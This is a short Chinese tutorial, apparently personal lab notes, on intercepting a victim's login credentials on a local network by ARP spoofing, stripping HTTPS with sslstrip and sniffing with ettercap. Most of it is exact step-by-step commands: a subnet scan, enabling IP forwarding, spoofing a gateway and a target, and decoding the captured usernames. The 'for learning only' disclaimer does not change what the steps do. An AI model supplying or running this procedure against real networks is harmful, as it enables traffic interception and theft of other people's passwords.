注:本教程只用于学习使用,切勿拿去搞破坏,一切法律后果与本人无关
1.原理:
在局域网环境中,通过ARP欺骗,将目标主机的网络包都流经攻击者,然后再通过嗅探的方式从而获取到HTTPS的一些数据信息。原理和HTTP账号密码获取类似,不过https是由ssl加密,加密性的安全性更高,使用工具sslstrip可将实现https转换成http,再用HTTP账号密码获取方法就可以了。
(大部分的大型网站都无法进行嗅探获取密码。试验失败了,这里做实验记录)
2. 局域网IP扫描:
命令:
fping -asg 192.168.43.0/24
ctrl+c停止扫描
3. 工具使用:arpspoof、ettercap、sslstrip
命令:
arpspoof -i +网卡 -t +网关 +目标IP
ettercap -Tq -i +网卡
-T参数即--text,启动文本模式;-q参数即--quiet,不显示包的内容
sslstrip -a -f -k
ettercap是在linux下运行的 。其实功能都是差不多的,我称呼它为嗅探工具,ARP欺骗,DNS,劫持,中间人攻击等等。总之这是一款强大的安全测试工具。
4. 实践记录:
4.1更改Sslstrip配置文件
vim /etc/ettercap/etter.conf
保存退出
4.2查看自己的IP和网关:ifconfig、route -n
4.3扫描其他人的IP:fping 192.168.43.0/24
4.4进行IP流量转发:
echo 1 > /proc//sys/net/ipv4/ip_forward
4.5进行ARP欺骗
命令:arpspoof -i eth0 -t 192.168.43.1 192.168.43.38
4.6再开一个终端,运行sslstrip -a -f -k 实现https转换成http以获取帐号密码
4.7再开一个终端,开始嗅探
输入:ettercap -Tq -i eth0
4.8当受害者登陆后,即可嗅探到账户和密码
当登录名称的字符是中文时,在嗅探到的内容中Content中的内容不是中文而是其URL形式的编码:
对于这种编码直接URL解码即可,最简单的方法是去URL解码的网站进行解码:
end
扫码即可关注~
ID和我一起学习记录
领取专属 10元无门槛券
私享最新 技术干货